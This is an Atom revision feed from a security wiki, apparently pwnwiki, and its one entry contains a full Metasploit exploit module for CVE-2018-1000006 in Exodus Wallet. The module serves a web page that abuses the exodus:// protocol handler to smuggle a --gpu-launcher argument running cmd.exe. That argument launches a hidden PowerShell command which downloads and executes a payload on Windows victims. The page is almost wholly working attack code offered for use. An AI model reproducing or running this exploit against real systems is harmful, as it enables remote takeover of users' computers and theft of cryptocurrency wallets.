<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-1000006_Exodus_Wallet_%28ElectronJS_Framework%29_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-1000006 Exodus Wallet (ElectronJS Framework) 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-1000006_Exodus_Wallet_%28ElectronJS_Framework%29_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-1000006_Exodus_Wallet_(ElectronJS_Framework)_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T04:36:35Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-1000006_Exodus_Wallet_(ElectronJS_Framework)_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1528&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==MSFEXP== &lt;pre&gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core/...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-1000006_Exodus_Wallet_(ElectronJS_Framework)_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1528&amp;oldid=prev"/>
		<updated>2021-04-11T02:06:36Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==MSFEXP== &amp;lt;pre&amp;gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &amp;#039;msf/core/...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==MSFEXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This module requires Metasploit: https://metasploit.com/download&lt;br /&gt;
# Current source: https://github.com/rapid7/metasploit-framework&lt;br /&gt;
##&lt;br /&gt;
 &lt;br /&gt;
require 'msf/core/exploit/powershell'&lt;br /&gt;
 &lt;br /&gt;
class MetasploitModule &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
  Rank = ManualRanking&lt;br /&gt;
 &lt;br /&gt;
  include Msf::Exploit::EXE&lt;br /&gt;
  include Msf::Exploit::Powershell&lt;br /&gt;
  include Msf::Exploit::Remote::HttpServer::HTML&lt;br /&gt;
 &lt;br /&gt;
  def initialize(info = {})&lt;br /&gt;
    super(update_info(info,&lt;br /&gt;
      'Name'         =&amp;gt; 'Exodus Wallet (ElectronJS Framework) remote Code Execution',&lt;br /&gt;
      'Description'  =&amp;gt; %q(&lt;br /&gt;
         This module exploits a Remote Code Execution vulnerability in Exodus Wallet,&lt;br /&gt;
         a vulnerability in the ElectronJS Framework protocol handler can be used to&lt;br /&gt;
         get arbitrary command execution if the user clicks on a specially crafted URL.&lt;br /&gt;
      ),&lt;br /&gt;
      'License'      =&amp;gt; MSF_LICENSE,&lt;br /&gt;
      'Author'       =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          'Wflki',          # Original exploit author&lt;br /&gt;
          'Daniel Teixeira' # MSF module author&lt;br /&gt;
        ],&lt;br /&gt;
      'DefaultOptions' =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
          'SRVPORT'    =&amp;gt; '80',&lt;br /&gt;
          'URIPATH'    =&amp;gt; '/',&lt;br /&gt;
        },&lt;br /&gt;
      'References'     =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          [ 'EDB', '43899' ],&lt;br /&gt;
          [ 'BID', '102796' ],&lt;br /&gt;
          [ 'CVE', '2018-1000006' ],&lt;br /&gt;
        ],&lt;br /&gt;
      'Platform'       =&amp;gt; 'win',&lt;br /&gt;
      'Targets'        =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          ['PSH (Binary)', {&lt;br /&gt;
            'Platform' =&amp;gt; 'win',&lt;br /&gt;
            'Arch' =&amp;gt; [ARCH_X86, ARCH_X64]&lt;br /&gt;
          }]&lt;br /&gt;
        ],&lt;br /&gt;
      'DefaultTarget'  =&amp;gt; 0,&lt;br /&gt;
      'DisclosureDate' =&amp;gt; 'Jan 25 2018'&lt;br /&gt;
    ))&lt;br /&gt;
 &lt;br /&gt;
  register_advanced_options(&lt;br /&gt;
    [&lt;br /&gt;
      OptBool.new('PSH-Proxy', [ true,  'PSH - Use the system proxy', true ]),&lt;br /&gt;
    ], self.class&lt;br /&gt;
  )&lt;br /&gt;
  end&lt;br /&gt;
 &lt;br /&gt;
  def gen_psh(url)&lt;br /&gt;
      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl&lt;br /&gt;
 &lt;br /&gt;
      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))&lt;br /&gt;
 &lt;br /&gt;
      download_and_run = &amp;quot;#{ignore_cert}#{download_string}&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)&lt;br /&gt;
  end&lt;br /&gt;
 &lt;br /&gt;
  def serve_payload(cli)&lt;br /&gt;
   data = cmd_psh_payload(payload.encoded,&lt;br /&gt;
      payload_instance.arch.first,&lt;br /&gt;
      remove_comspec: true,&lt;br /&gt;
      exec_in_place: true&lt;br /&gt;
    )&lt;br /&gt;
 &lt;br /&gt;
    print_status(&amp;quot;Delivering Payload&amp;quot;)&lt;br /&gt;
    send_response_html(cli, data, 'Content-Type' =&amp;gt; 'application/octet-stream')&lt;br /&gt;
  end&lt;br /&gt;
 &lt;br /&gt;
  def serve_page(cli)&lt;br /&gt;
    psh = gen_psh(&amp;quot;#{get_uri}payload&amp;quot;)&lt;br /&gt;
    psh_escaped = psh.gsub(&amp;quot;\\&amp;quot;,&amp;quot;\\\\\\\\&amp;quot;).gsub(&amp;quot;'&amp;quot;,&amp;quot;\\\\'&amp;quot;)&lt;br /&gt;
    val = rand_text_alpha(5)&lt;br /&gt;
 &lt;br /&gt;
    html = %Q|&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;!doctype html&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
  window.location = 'exodus://#{val}&amp;quot; --gpu-launcher=&amp;quot;cmd.exe /k #{psh_escaped}&amp;quot; --#{val}='&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
|&lt;br /&gt;
    send_response_html(cli, html)&lt;br /&gt;
  end&lt;br /&gt;
 &lt;br /&gt;
  def on_request_uri(cli, request)&lt;br /&gt;
    case request.uri&lt;br /&gt;
    when /payload$/&lt;br /&gt;
      serve_payload(cli)&lt;br /&gt;
    else&lt;br /&gt;
      serve_page(cli)&lt;br /&gt;
    end&lt;br /&gt;
  end&lt;br /&gt;
 &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>